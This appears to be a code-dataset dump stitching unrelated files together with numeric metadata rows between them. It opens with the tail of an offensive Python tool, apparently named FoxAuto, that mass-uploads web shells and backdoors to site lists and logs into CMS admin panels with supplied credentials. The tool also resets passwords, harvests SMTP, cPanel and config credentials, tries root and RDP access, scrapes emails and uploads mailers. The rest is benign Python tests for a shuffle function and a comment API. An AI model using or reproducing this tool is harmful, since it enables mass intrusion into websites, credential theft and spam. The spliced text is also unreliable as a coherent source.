print('\n {}[{}?{}] {}Choose where do you want upload it.\n'.format(fw, fr, fw, fc))
print(' [1] {}In the same path {}[Default]'.format(fw, fg))
print(' [2] {}In the main path'.format(fw))
try :
tyUP = int(input_Fox('\n --> : '))
except:
tyUP = 1
if (tyUP != 1 and tyUP != 2) :
tyUP = 1
if (w == 7 or w == 27):
q = str(input_Fox('\n {}[{}?{}] {}Do you want to get (cPanel/SMTP) ? {}[{}Y{}/{}N{}] : '.format(fw, fr, fw, fc, fw, fg, fw, fr, fw)))
print('')
run()
if (w == 19) :
for site in sites:
try:
url = site.strip()
print(' --| {}{}'.format(fc, url))
newBackdor = uploadFile_ALL(url)
if (newBackdor is False) :
print('')
continue
else :
newBackdor = check(newBackdor)
open('Results/backdors.txt', 'a').write('{}?php={}/_@files/php/up.txt\n'.format(newBackdor, dom))
if (tyUP == 1) :
uploadFile(newBackdor, srcShell, tyShell)
elif (tyUP == 2) :
uploadFileMain(newBackdor, srcShell, tyShell)
print('')
except:
print(' {}[-] Failed.\n'.format(fr))
return
if (w == 16):
filezip = str(input_Fox(' Your File\'s name (.zip) --> : '))
if (not os.path.isfile(filezip)):
print("\n {}({}) File does not exist.\n".format(fr, filezip))
return
print('')
if (w == 22 or w ==23 or w == 24 or w == 25 or w == 26) :
if (w == 24):
filezip = str(input_Fox(' Your File\'s name .zip --> : '))
if (not os.path.isfile(filezip)):
print("\n {}({}) File does not exist.\n".format(fr, filezip))
return
print('')
for site in sites:
try:
datacPanel = site.strip()
if (w == 22 or w ==23 or w == 24 or w ==25) :
cp = cPanel(datacPanel, up=1)
if (cp is False):
print('')
continue
else :
newBackdor = check(cp)
open('Results/backdors.txt', 'a').write('{}?php={}/_@files/php/up.txt\n'.format(newBackdor, dom))
if (w == 22) :
finderSMTP(newBackdor)
getSMTP(newBackdor)
elif (w == 23):
uploadFile(newBackdor, srcShell, tyShell)
elif (w == 24) :
ZIP(newBackdor, filezip)
elif (w == 25) :
checkSend(newBackdor, datacPanel)
elif (w == 26) :
cp = cPanel(datacPanel)
if (cp is False):
print('')
continue
else :
cpL = datacPanel.split('|')
if (tyReport == 1):
ReportsCP_Auto(cpL[0], cpL[1], cpL[2], cp[1], cp[0], cp[2], cp[3])
elif (tyReport == 2):
ReportsCP_SemiAuto(cpL[0], cpL[1], cpL[2], cp[1], cp[0], cp[2], cp[3], email)
print('')
except:
print(' {}[-] Failed.\n'.format(fr))
return
t = 'resetpassword'
if (w == 27) :
logins = []
wp = 0
jm = 0
oc = 0
dp = 0
for site in sites:
panel = site.strip()
if (not re.findall(re.compile('http(.*)/(.*)#(.*)@(.*)'), panel)):
print(' {}[-] The list must be => {}http://domain.com/wp-login.php#{}user{}@{}pass\n'.format(fr, fg, fr, fg, fr))
print(' {} OR {}http://domain.com/administrator/index.php#{}user{}@{}pass\n'.format(fr, fg, fr, fg, fr))
print(' {} OR {}http://domain.com/admin/index.php#{}user{}@{}pass\n'.format(fr, fg, fr, fg, fr))
print(' {} OR {}http://domain.com/user/login#{}user{}@{}pass\n'.format(fr, fg, fr, fg, fr))
return
if ('/wp-login.php' in panel) :
wp = 1
logins.append(panel)
elif ('/administrator' in panel) :
jm = 1
logins.append(panel)
elif ('/admin' in panel) :
oc = 1
logins.append(panel)
elif ('/user' in panel) :
dp = 1
logins.append(panel)
shells = uploadShellbyPanels(logins, wp, jm, oc, dp, srcShell, tyShell)
if (q.lower() == 'y' or q.lower() == 'yes') :
if (shells is False) :
return
else :
for shell in shells :
try :
print(' --| {}{}'.format(fc, URL_FOX(shell)))
newShell = check(shell)
resetPassword(newShell, '{}?php={}/_@files/php/up.txt'.format(newShell, dom), t)
finderSMTP(newShell)
getSMTP(newShell)
except :
print(' {}[-] Failed.'.format(fr))
print('')
return
token = re.findall(re.compile('<token>(.*)</token>'), getToken)[0]
for site in sites :
try :
url = site.strip()
print(' --| {}{}'.format(fc, url))
shell_path = upload(url)
if(shell_path is False):
print(' {}[-] Shell not Working OR Upload failed.\n'.format(fr))
open('Results/bad.txt', 'a').write('{}\n'.format(url))
continue
elif('FoxAuto' in shell_Fox and 'hexdec' in cia and len(token) == 9):
shell_path = check(shell_path)
print(' {}[+] Shell is Working.'.format(fg))
open('Results/backdors.txt', 'a').write('{}?php={}/_@files/php/up.txt\n'.format(shell_path, dom))
if (w == 1) :
if (tyRest == 1):
resetPassword(shell_path, url, t)
elif (tyRest == 2):
resetPassword2(shell_path, url, email)
elif (w == 2) :
finderSMTP(shell_path)
getSMTP(shell_path)
elif (w == 3) :
finderScript(shell_path, url)
elif (w == 4) :
accesshash(shell_path, url)
elif (w == 5) :
getConfig(shell_path, url)
elif (w == 6) :
config = getConfig(shell_path, url)
if (config is False):
print('')
continue
else :
getConfigPasswords_cPanelcracker(shell_path, config)
elif (w == 7) :
config = getConfig(shell_path, url)
if (config is False):
print('')
continue
else :
logins = ChangePanel(shell_path, config)
if (logins is False):
print('')
continue
else :
shells = uploadShellbyPanels(logins[0], logins[1], logins[2], logins[3], 0, srcShell, tyShell)
if (q.lower() == 'y' or q.lower() == 'yes') :
if (shells is False):
print('')
continue
else :
for shell in shells:
try :
print(' --| {}{}'.format(fc, URL_FOX(shell)))
newShell = check(shell)
resetPassword(newShell, '{}?php={}/_@files/php/up.txt'.format(newShell, dom), t)
finderSMTP(newShell)
getSMTP(newShell)
except :
print(' {}[-] Failed.'.format(fr))
print('')
elif (w == 8) :
getRoot(shell_path, url)
elif (w == 9) :
getRDP(shell_path, url)
elif (w == 10) :
getDomains(shell_path)
elif (w == 11) :
getMails(shell_path)
elif (w == 12) :
config = getConfig(shell_path, url)
if (config is False):
print('')
continue
else :
MassGetMails(shell_path, config)
elif (w == 13) :
uploadMailer(shell_path, srcMailer)
elif (w == 14) :
if (tyUP == 1):
uploadFile(shell_path, srcShell, tyShell + 5)
elif (tyUP == 2):
uploadFileMain(shell_path, srcShell, tyShell + 5)
elif (w == 15):
if (tyUP == 1):
massUploadIndex1(shell_path, fileSrc, nameF, q, nameA)
elif (tyUP == 2):
massUploadIndex2(shell_path, fileSrc, q, nameA)
elif (w == 16) :
ZIP(shell_path, filezip)
elif (w == 17) :
checkSend(shell_path, url)
elif (w == 18) :
if (tyReport == 1):
ReportsShell_Auto(shell_path, url)
elif (tyReport == 2):
ReportsShell_SemiAuto(shell_path, url, email)
elif (w == 20) :
resetPassword(shell_path, url, t)
finderSMTP(shell_path)
getSMTP(shell_path)
elif (w == 21) :
resetPassword(shell_path, url, t)
finderSMTP(shell_path)
getSMTP(shell_path)
accesshash(shell_path, url)
getRoot(shell_path, url)
config = getConfig(shell_path, url)
if (config is False):
print('')
continue
else :
getConfigPasswords_cPanelcracker(shell_path, config)
print('')
else :
print(' {}[-] Shell not Working OR Upload failed.\n'.format(fr))
open('Results/bad.txt', 'a').write('{}\n'.format(url))
except :
print(' {}[-] Shell not Working OR Upload failed.\n'.format(fr))
open('Results/bad.txt', 'a').write('{}\n'.format(url.strip()))
except :
pass
FoxAuto()
input_Fox(' {}[{}!{}] {}Press Enter to exit '.format(fw, fr, fw, fc))
| 93.566038
| 32,310
| 0.703812
| 31,356
| 317,376
| 6.380214
| 0.040024
| 0.190385
| 0.180308
| 0.159794
| 0.883224
| 0.865059
| 0.851713
| 0.835333
| 0.816783
| 0.803312
| 0
| 0.00965
| 0.100748
| 317,376
| 3,392
| 32,311
| 93.566038
| 0.691322
| 0.003019
| 0
| 0.600794
| 0
| 0.127062
| 0.17387
| 0.053253
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025657
| false
| 0.049481
| 0.004582
| 0
| 0.081246
| 0.114844
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d5473f62d44ca968e023b3af75a60a54bc3c1b92
| 2,206
|
py
|
Python
|
problems/test_ic_36_single_riffle_shuffle.py
|
gregdferrell/algo
|
974ae25b028d49bcb7ded6655a7e11dcf6aa221d
|
[
"MIT"
] | null | null | null |
problems/test_ic_36_single_riffle_shuffle.py
|
gregdferrell/algo
|
974ae25b028d49bcb7ded6655a7e11dcf6aa221d
|
[
"MIT"
] | null | null | null |
problems/test_ic_36_single_riffle_shuffle.py
|
gregdferrell/algo
|
974ae25b028d49bcb7ded6655a7e11dcf6aa221d
|
[
"MIT"
] | null | null | null |
from .ic_36_single_riffle_shuffle import single_riffle_shuffle_1
def test_single_riffle_shuffle_1_empty_deck():
shuffled_deck = []
half_1 = [1, 2, 3, 4, 5]
half_2 = [6, 7, 8, 9, 10]
assert not single_riffle_shuffle_1(shuffled_deck, half_1, half_2)
def test_single_riffle_shuffle_1_empty_half_1():
shuffled_deck = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
half_1 = []
half_2 = [6, 7, 8, 9, 10]
assert not single_riffle_shuffle_1(shuffled_deck, half_1, half_2)
def test_single_riffle_shuffle_1_empty_half_2():
shuffled_deck = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
half_1 = [1, 2, 3, 4, 5]
half_2 = []
assert not single_riffle_shuffle_1(shuffled_deck, half_1, half_2)
def test_single_riffle_shuffle_1_unequal_lengths():
shuffled_deck = [1, 2, 3, 4, 5, 6, 7, 8, 9]
half_1 = [1, 2, 3, 4, 5]
half_2 = [6, 7, 8, 9, 10]
assert not single_riffle_shuffle_1(shuffled_deck, half_1, half_2)
def test_single_riffle_shuffle_1_cut_the_deck():
shuffled_deck = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
half_1 = [1, 2, 3, 4, 5]
half_2 = [6, 7, 8, 9, 10]
assert single_riffle_shuffle_1(shuffled_deck, half_1, half_2)
def test_single_riffle_shuffle_1_smallest_half():
shuffled_deck = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
half_1 = [1]
half_2 = [2, 3, 4, 5, 6, 7, 8, 9, 10]
assert single_riffle_shuffle_1(shuffled_deck, half_1, half_2)
def test_single_riffle_shuffle_1_beauty_shuffle():
shuffled_deck = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
half_1 = [1, 3, 5, 7, 9]
half_2 = [2, 4, 6, 8, 10]
assert single_riffle_shuffle_1(shuffled_deck, half_1, half_2)
def test_single_riffle_shuffle_1_good_shuffle():
shuffled_deck = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
half_1 = [1, 2, 5, 6, 9, 10]
half_2 = [3, 4, 7, 8]
assert single_riffle_shuffle_1(shuffled_deck, half_1, half_2)
def test_single_riffle_shuffle_1_barely_off_1():
shuffled_deck = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
half_1 = [1, 2, 5, 6, 10, 9]
half_2 = [3, 4, 7, 8]
assert not single_riffle_shuffle_1(shuffled_deck, half_1, half_2)
def test_single_riffle_shuffle_1_different_card():
shuffled_deck = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
half_1 = [1, 2, 4, 11, 7, 8, 10]
half_2 = [3, 6, 9]
assert not single_riffle_shuffle_1(shuffled_deck, half_1, half_2)
| 26.902439
| 66
| 0.68495
| 450
| 2,206
| 3
| 0.082222
| 0.195556
| 0.30963
| 0.311111
| 0.868889
| 0.868889
| 0.868889
| 0.831852
| 0.831852
| 0.828889
| 0
| 0.144189
| 0.173164
| 2,206
| 81
| 67
| 27.234568
| 0.595943
| 0
| 0
| 0.54902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.196078
| 1
| 0.196078
| false
| 0
| 0.019608
| 0
| 0.215686
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
634db61c4c5e6cfc7f0245df4c5b27cc9505949e
| 226
|
py
|
Python
|
bibcat/tests/__init__.py
|
KnowledgeLinks/bibcat
|
ed530401290865dcfefb2ae661a8880e52876a48
|
[
"MIT"
] | 4
|
2018-02-13T20:36:29.000Z
|
2019-09-26T14:38:25.000Z
|
bibcat/tests/__init__.py
|
KnowledgeLinks/rdfw-bibcat
|
ed530401290865dcfefb2ae661a8880e52876a48
|
[
"MIT"
] | 11
|
2017-10-27T17:44:46.000Z
|
2018-08-15T17:27:25.000Z
|
bibcat/tests/__init__.py
|
KnowledgeLinks/rdfw-bibcat
|
ed530401290865dcfefb2ae661a8880e52876a48
|
[
"MIT"
] | 1
|
2017-01-23T19:52:01.000Z
|
2017-01-23T19:52:01.000Z
|
import unittest
from linkers import *
from ingesters.test_oai_pmh import *
from ingesters.test_rels_ext import *
from rml.test_processor import *
from test_bibcat_funcs import *
if __name__ == '__main__':
unittest.main()
| 22.6
| 37
| 0.787611
| 32
| 226
| 5.09375
| 0.53125
| 0.245399
| 0.233129
| 0.282209
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.141593
| 226
| 9
| 38
| 25.111111
| 0.840206
| 0
| 0
| 0
| 0
| 0
| 0.035398
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
639499b06f404fa4a27727e1aa7f4c7b192007d4
| 74,186
|
py
|
Python
|
fluiddb/web/test/test_comment.py
|
fluidinfo/fluiddb
|
b5a8c8349f3eaf3364cc4efba4736c3e33b30d96
|
[
"Apache-2.0"
] | 3
|
2021-05-10T14:41:30.000Z
|
2021-12-16T05:53:30.000Z
|
fluiddb/web/test/test_comment.py
|
fluidinfo/fluiddb
|
b5a8c8349f3eaf3364cc4efba4736c3e33b30d96
|
[
"Apache-2.0"
] | null | null | null |
fluiddb/web/test/test_comment.py
|
fluidinfo/fluiddb
|
b5a8c8349f3eaf3364cc4efba4736c3e33b30d96
|
[
"Apache-2.0"
] | 2
|
2018-01-24T09:03:21.000Z
|
2021-06-25T08:34:54.000Z
|
from calendar import timegm
from datetime import datetime, timedelta
from json import dumps, loads
from time import time as get_time
from twisted.internet.defer import inlineCallbacks
from twisted.web.http import BAD_REQUEST, UNAUTHORIZED
from twisted.web.http_headers import Headers
from fluiddb.data.system import createSystemData
from fluiddb.model.user import UserAPI, getUser
from fluiddb.security.comment import SecureCommentAPI
from fluiddb.testing.basic import FluidinfoTestCase
from fluiddb.testing.doubles import FakeRequest
from fluiddb.testing.resources import (
CacheResource, ConfigResource, DatabaseResource, IndexResource,
LoggingResource, ThreadPoolResource)
from fluiddb.testing.session import login
from fluiddb.web.comment import CommentResource
from fluiddb.util.transact import Transact
from fluiddb.model.value import TagValueAPI
from fluiddb.model.object import ObjectAPI
class CommentResourceTest(FluidinfoTestCase):
resources = [('cache', CacheResource()),
('config', ConfigResource()),
('client', IndexResource()),
('log', LoggingResource()),
('store', DatabaseResource()),
('threadPool', ThreadPoolResource())]
def setUp(self):
super(CommentResourceTest, self).setUp()
createSystemData()
UserAPI().create([
(u'username', u'password', u'User', u'user@example.com'),
(u'fluidinfo.com', u'password', u'User', u'user@example.com')])
self.user = getUser(u'username')
self.transact = Transact(self.threadPool)
self.store.commit()
def invoke(self, method, _username=None, **kwargs):
"""Invoke a JSON-RPC method and return the result."""
username = _username or u'username'
with login(username, self.user.objectID, self.transact) as session:
body = dumps({'id': 100, 'jsonrpc': '2.0', 'method': method,
'params': kwargs})
headers = Headers({'Content-Length': [str(len(body))],
'Content-Type': ['application/json']})
request = FakeRequest(headers=headers, body=body)
resource = CommentResource(None, session)
return resource.deferred_render_POST(request)
@inlineCallbacks
def testAddComment(self):
"""
The C{addComment} method creates a comment and returns a C{dict} with
a mapping of tags to values that represent that comment.
"""
result = yield self.invoke(
'addComment', about=u'trout fishing in america',
text='@joe @sam http://abc.com/def.html is #super #cool')
result = loads(result)
url = result['result']['fluidinfo.com/info/url']
urlFragment = 'https://fluidinfo.com/comment/fluidinfo.com/username/'
self.assertTrue(url.startswith(urlFragment))
isoTime = url[len(urlFragment):]
when = datetime.strptime(isoTime, '%Y-%m-%dT%H:%M:%S.%f')
timestamp = result['result']['fluidinfo.com/info/timestamp']
self.assertEqual(
timegm(when.utctimetuple()) + float(when.strftime('0.%f')),
timestamp)
self.assertEqual(
{'jsonrpc': u'2.0',
'id': 100,
'result': {
'fluidinfo.com/info/about': [
u'trout fishing in america', u'http://abc.com/def.html',
u'#super', u'#cool', u'@joe', u'@sam'],
'fluidinfo.com/info/text': (
u'@joe @sam http://abc.com/def.html is #super #cool'),
'fluidinfo.com/info/timestamp': timestamp,
'fluidinfo.com/info/url': url,
'fluidinfo.com/info/username': u'username'}},
result)
@inlineCallbacks
def testAddCommentWithCreationTime(self):
"""
The C{addComment} method optionally accepts a creation time to use
when creating the comment.
"""
result = yield self.invoke(
'addComment', about=u'trout fishing in america',
text='@joe @sam http://abc.com/def.html is #super #cool',
creationTime='2012-05-16T12:13:14.16253')
result = loads(result)
self.assertEqual(
{u'jsonrpc': u'2.0',
u'id': 100,
u'result': {
u'fluidinfo.com/info/about': [
u'trout fishing in america', u'http://abc.com/def.html',
u'#super', u'#cool', u'@joe', u'@sam'],
u'fluidinfo.com/info/text': (
u'@joe @sam http://abc.com/def.html is #super #cool'),
u'fluidinfo.com/info/timestamp': 1337170394.16253,
u'fluidinfo.com/info/url': (
u'https://fluidinfo.com/comment/'
'fluidinfo.com/username/2012-05-16T12:13:14.162530'),
u'fluidinfo.com/info/username': u'username'}},
result)
@inlineCallbacks
def testExplicitAboutValueIsTheFirstThingInTheCreatedAboutTag(self):
"""
When a comment is created with an explicit about value and about
values in the comment text, the explicit value must be the first
element in the resulting fluidinfo.com/info/about tag.
"""
result = yield self.invoke(
'addComment', about=u'explicit about',
text='#Fishing is cool.')
result = loads(result)
abouts = result['result']['fluidinfo.com/info/about']
self.assertEqual(abouts[0], u'explicit about')
# Make sure the list has more than just the explicit about value in
# it, so we know it's the first value among several (as opposed to
# being the first value simply because no other values were present
# in the comment text).
self.assertTrue(len(abouts) > 1)
@inlineCallbacks
def testAddCommentWithMalformedCreationTime(self):
"""
The C{addComment} method returns a C{BAD_REQUEST} error if the
specified creation time is malformed.
"""
result = yield self.invoke(
'addComment', about=u'trout fishing in america',
text='@joe @sam http://abc.com/def.html is #super #cool',
creationTime='malformed')
self.assertEqual(
{u'jsonrpc': u'2.0', u'id': 100,
u'error': {u'message': u'Creation time is malformed.',
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testAddCommentWithoutCommentText(self):
"""
The C{addComment} method returns a C{BAD_REQUEST} error if no comment
text is provided.
"""
result = yield self.invoke('addComment', about=u'about')
self.assertEqual(
{u'jsonrpc': u'2.0', u'id': 100,
u'error': {
u'message': u'Comment text non-existent or just whitespace.',
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testAddCommentWithEmptyCommentText(self):
"""
The C{addComment} method returns a C{BAD_REQUEST} error if the comment
text provided is empty.
"""
result = yield self.invoke('addComment', about=u'about')
self.assertEqual(
{u'jsonrpc': u'2.0', u'id': 100,
u'error': {
u'message': u'Comment text non-existent or just whitespace.',
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testAddCommentWithAnonymousUser(self):
"""
The C{addComment} method returns an C{UNAUTHORIZED} error if the
anonymous user attempts to create a comment.
"""
result = yield self.invoke('addComment', _username=u'anon',
about=u'about', text=u'text')
self.assertEqual({u'jsonrpc': u'2.0', u'id': 100,
u'error': {u'message': u'Access denied.',
u'code': UNAUTHORIZED}},
loads(result))
@inlineCallbacks
def testGetForObjectWithoutComments(self):
"""
The C{getForObject} method returns an empty C{list} if no comments are
available for the specified about value.
"""
result = yield self.invoke('getForObject', about=u'about')
self.assertEqual({'id': 100, 'jsonrpc': '2.0',
'result': {'nextPageID': None,
'currentPageID': None,
'comments': []}},
loads(result))
@inlineCallbacks
def testGetForObject(self):
"""
The C{getForObject} method returns the comments available for the
specified object, sorted from newest to eldest.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getForObject', about=u'about')
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 2',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/2',
u'fluidinfo.com/info/username': u'username'},
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForObjectWithUsername(self):
"""
The C{getForObject} method returns the comments about the specified
object made by the specified user, sorted from newest to eldest.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username1', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username2', about=[u'about'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getForObject', about=u'about',
username=u'username1')
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336518000.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username1'}]},
result)
@inlineCallbacks
def testGetForObjectWithFollowedByUsername(self):
"""
The C{getForObject} method returns the comments about the specified
object made by the specified user's friends, sorted from newest to
eldest.
"""
[(objectID, _)] = UserAPI().create([
(u'friend', u'secret', u'Friend', u'friend@example.com')])
TagValueAPI(self.user).set({objectID: {u'username/follows': None}})
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'friend', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'foe', about=[u'about'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getForObject', about=u'about',
followedByUsername=u'username')
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336518000.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'friend'}]},
result)
@inlineCallbacks
def testGetForObjectWithFilterTags(self):
"""
The C{getForObject} method returns the comments about the specified
object made having the specified tags, sorted from newest to
eldest.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'friend', about=[u'about'],
when=time,
url='http://example.com/1')
comments.create(u'Comment 2', u'foe', about=[u'about'],
when=time + timedelta(days=1),
url='http://example.com/2')
# Get the comment ID based on the expected about value
commentAbout = u'fluidinfo.com friend %s' % time.isoformat()
commentID = ObjectAPI(self.user).create(commentAbout)
TagValueAPI(self.user).set({commentID: {u'username/tag': None}})
self.store.commit()
result = yield self.invoke('getForObject', about=u'about',
filterTags=[u'username/tag'])
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'friend'}]},
result)
@inlineCallbacks
def testGetForObjectWithfilterAbout(self):
"""
The C{getForObject} method returns the comments about the specified
object and also with the given object filter, sorted from newest to
eldest.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'friend', about=[u'about', u'+filter'],
when=time,
url='http://example.com/1')
comments.create(u'Comment 2', u'foe', about=[u'about'],
when=time + timedelta(days=1),
url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getForObject', about=u'about',
filterAbout=u'+filter')
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about', u'+filter'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'friend'}]},
result)
@inlineCallbacks
def testGetForObjectWithNextPageID(self):
"""
The C{getForObject} method uses the C{nextPageID} to return the
correct page of comments.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getForObject', about=u'about',
nextPageID=1336604400.0)
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336518000.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForObjectWithCurrentPageID(self):
"""
The C{getForObject} method uses the C{currentPageID} to return the
correct page of comments.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time + timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
self.store.commit()
result = yield self.invoke('getForObject', about=u'about',
currentPageID=1336604400)
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336690800.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336690800.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForObjectWithMalformedNextPageID(self):
"""
The C{getForObject} method raises an error if the C{nextPageID}
argument is not well formed.
"""
result = yield self.invoke('getForObject', about=u'about',
nextPageID='malformed')
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"Couldn't parse nextPageID.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetForObjectWithMalformedCurrentPageID(self):
"""
The C{getForObject} method raises an error if the C{currentPageID}
argument is not well formed.
"""
result = yield self.invoke('getForObject', about=u'about',
currentPageID='malformed')
self.assertEqual({u'jsonrpc': u'2.0',
u'id': 100,
u'error': {
u'message': u"Couldn't parse currentPageID.",
u'code': BAD_REQUEST}},
loads(result))
@inlineCallbacks
def testGetForObjectReturnsNextPageID(self):
"""
The C{getForObject} method returns a C{nextPageID} value when another
page of comments could be loaded.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
for i in range(26):
comments.create(u'Comment', u'username', about=[u'about'],
when=time - timedelta(minutes=i),
url='http://example.com/comment')
self.store.commit()
result = yield self.invoke('getForObject', about=u'about')
result = loads(result)['result']
self.assertEqual(1336602960, result['nextPageID'])
self.assertEqual(25, len(result['comments']))
@inlineCallbacks
def testGetForObjectWithAdditionalTags(self):
"""
The C{getForObject} method invoked with a list of C{additionalTags}
returns those in addition to the default ones.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
comments.create(u'Comment 1', u'username', about=[u'about'],
when=time - timedelta(days=1),
url='http://example.com/1')
comments.create(u'Comment 2', u'username', about=[u'about'],
when=time, url='http://example.com/2')
# Get the comment ID based on the expected about value
commentAbout = u'fluidinfo.com username %s' % time.isoformat()
commentID = ObjectAPI(self.user).create(commentAbout)
TagValueAPI(self.user).set({commentID: {u'username/custom': u'Honk'}})
self.store.commit()
result = yield self.invoke('getForObject', about=u'about',
additionalTags=[u'username/custom'])
result = loads(result)['result']
self.assertEqual(
{'nextPageID': None,
'currentPageID': 1336604400.0,
'comments': [
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 2',
u'fluidinfo.com/info/timestamp': 1336604400.0,
u'fluidinfo.com/info/url': u'http://example.com/2',
u'fluidinfo.com/info/username': u'username',
u'username/custom': u'Honk'},
{u'fluidinfo.com/info/about': [u'about'],
u'fluidinfo.com/info/text': u'Comment 1',
u'fluidinfo.com/info/timestamp': 1336518000.0,
u'fluidinfo.com/info/url': u'http://example.com/1',
u'fluidinfo.com/info/username': u'username'}]},
result)
@inlineCallbacks
def testGetForObjectWithAdditionalTagsEmptyList(self):
"""
The C{getForObject} method, if invoked with an empty C{additionalTags}
list acts the same as when none are specified.
"""
time = datetime.utcfromtimestamp(1336604400)
comments = SecureCommentAPI(self.user)
